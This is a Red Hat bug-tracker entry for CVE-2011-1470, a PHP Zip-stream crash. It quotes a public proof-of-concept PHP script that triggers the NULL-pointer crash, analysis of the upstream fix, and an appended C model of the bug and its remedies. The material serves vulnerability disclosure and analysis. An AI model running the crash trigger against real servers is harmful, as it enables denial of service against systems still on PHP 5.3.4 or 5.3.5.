Bug 690911 (CVE-2011-1470)
| Field | Value | Field | Value |
|---|---|---|---|
| Summary | CVE-2011-1470 php: crash when processing certain Zip archives | | |
| Product | [Other] Security Response | Reporter | Jan Lieskovsky <jlieskov> |
| Component | vulnerability | Assignee | Red Hat Product Security <security-response-team> |
| Status | CLOSED NOTABUG | QA Contact | |
| Severity | low | Docs Contact | |
| Priority | low | | |
| Version | unspecified | CC | bressers, dkutalek, fedora, jorton, rpm |
| Target Milestone | --- | Keywords | Security |
| Target Release | --- | | |
| Hardware | All | | |
| OS | Linux | | |
| Whiteboard | | | |
| Fixed In Version | | Doc Type | Bug Fix |
| Doc Text | | Story Points | --- |
| Clone Of | | Environment | |
| Last Closed | 2011-10-12 11:42:06 UTC | Type | --- |
| Regression | --- | Mount Type | --- |
| Documentation | --- | CRM | |
| Verified Versions | | Category | --- |
| oVirt Team | --- | RHEL 7.3 requirements from Atomic Host | |
| Cloudforms Team | --- | Target Upstream Version | |
| Embargoed | | | |
| Bug Depends On | | | |
| Bug Blocks | 715030 | | |
Description
Jan Lieskovsky
2011-03-25 18:54:57 UTC
Public PoC from [2]:
====================

```php
<?php
// Public PoC as quoted in the original comment (from reference [2]):
// open a jar, stat the manifest entry, obtain a stream handle for it,
// close the archive, then read from the stream.
$target_file = 'META-INF/MANIFEST.MF';
$za = new ZipArchive();
if ($za->open('test.jar') !== TRUE) {
    return FALSE;
}
if ($za->statName($target_file) !== FALSE) {
    $fd = $za->getStream($target_file);
} else {
    $fd = FALSE;
}
$za->close();
if (is_resource($fd)) {
    echo strlen(stream_get_contents($fd));
}
?>
```

Details from Joseph Orton:
=========================

The fix for this one:

http://svn.php.net/viewvc/php/php-src/branches/PHP_5_3/ext/zip/zip_stream.c?r1=306493&r2=306492&pathrev=306493

ensures stream->orig_path is non-NULL in the zip stream object. This matters because php_zip_ops_stat assumes ->orig_path is non-NULL:

```c
static int php_zip_ops_stat(php_stream *stream, php_stream_statbuf *ssb TSRMLS_DC) /* {{{ */
{
	struct zip_stat sb;
	const char *path = stream->orig_path;
	int path_len = strlen(stream->orig_path);
```

But php_zip_ops_stat() was only added in PHP 5.3.4; the function does not exist in 5.3.3, nor does anything else in ext/zip which assumes stream->orig_path is non-NULL.

Conclusion: CVE-2011-1470 only affects PHP 5.3.4 and 5.3.5.

Statement:

This issue does not affect the version of php shipped with Red Hat Enterprise Linux 4, 5 and 6. This issue does not affect the version of php53 shipped with Red Hat Enterprise Linux 5.
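The failure mode described in the comment above is a stat operation that calls strlen() on a stream's orig_path field without checking it for NULL, combined with an opener that never populated the field. The following is an added, constructed C model of that pairing; it is not PHP source and not part of the bug report. The type `toy_zip_stream`, the two openers (`open_stream_before_fix`, `open_stream_after_fix`) and the two stat variants are hypothetical names chosen here to contrast the unpatched behaviour with the upstream approach (always record the path) and with a defensive NULL check in the stat routine itself.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Constructed model of the field at issue: the zip stream's entry name.
 * NULL here is the crash condition the upstream fix removed. */
typedef struct {
    char *orig_path;
} toy_zip_stream;

/* malloc-based string copy, so the example does not depend on strdup(). */
static char *copy_string(const char *s) {
    size_t n = strlen(s) + 1;
    char *p = malloc(n);
    if (p != NULL) {
        memcpy(p, s, n);
    }
    return p;
}

/* Opener as modelled before the fix: orig_path is never set. */
static toy_zip_stream *open_stream_before_fix(const char *entry) {
    (void)entry;
    return calloc(1, sizeof(toy_zip_stream)); /* orig_path stays NULL */
}

/* Opener as modelled after the fix: orig_path is recorded from the entry name. */
static toy_zip_stream *open_stream_after_fix(const char *entry) {
    toy_zip_stream *s = calloc(1, sizeof(toy_zip_stream));
    if (s == NULL) {
        return NULL;
    }
    s->orig_path = copy_string(entry);
    if (s->orig_path == NULL) {
        free(s);
        return NULL;
    }
    return s;
}

static void close_stream(toy_zip_stream *s) {
    if (s != NULL) {
        free(s->orig_path);
        free(s);
    }
}

/* Stat as the vulnerable code did it: strlen() on orig_path with no check.
 * Undefined behaviour (a segfault in practice) when orig_path is NULL. */
static int stat_unchecked(const toy_zip_stream *s, size_t *path_len) {
    *path_len = strlen(s->orig_path);
    return 0;
}

/* Defensive stat: fail cleanly instead of dereferencing a NULL path. */
static int stat_checked(const toy_zip_stream *s, size_t *path_len) {
    if (s == NULL || s->orig_path == NULL) {
        return -1;
    }
    *path_len = strlen(s->orig_path);
    return 0;
}

typedef toy_zip_stream *(*opener_fn)(const char *);

/* 1 if a stream from this opener would make stat_unchecked() dereference NULL. */
static int unchecked_stat_would_crash(opener_fn opener, const char *entry) {
    toy_zip_stream *s = opener(entry);
    int crash = (s == NULL) || (s->orig_path == NULL);
    close_stream(s);
    return crash;
}

/* Path length from stat_unchecked(); only safe to call for a populated stream. */
static long unchecked_stat_path_len(opener_fn opener, const char *entry) {
    toy_zip_stream *s = opener(entry);
    size_t len = 0;
    long result = -1;
    if (s != NULL && s->orig_path != NULL && stat_unchecked(s, &len) == 0) {
        result = (long)len;
    }
    close_stream(s);
    return result;
}

/* Path length from stat_checked(), or -1 when the stream has no path. */
static long checked_stat_path_len(opener_fn opener, const char *entry) {
    toy_zip_stream *s = opener(entry);
    size_t len = 0;
    long result = -1;
    if (stat_checked(s, &len) == 0) {
        result = (long)len;
    }
    close_stream(s);
    return result;
}

int main(void) {
    const char *entry = "META-INF/MANIFEST.MF"; /* entry name used by the public PoC */
    printf("before fix, unchecked stat: %s\n",
           unchecked_stat_would_crash(open_stream_before_fix, entry) ? "would crash" : "ok");
    printf("after fix,  unchecked stat: path length %ld\n",
           unchecked_stat_path_len(open_stream_after_fix, entry));
    printf("before fix, checked stat:   %ld (refused, no crash)\n",
           checked_stat_path_len(open_stream_before_fix, entry));
    return 0;
}
```

The two remedies are independent: populating orig_path in the opener (the upstream change) removes the trigger, while the NULL check in the stat routine makes the operation fail closed if some other code path ever produces a stream without a path.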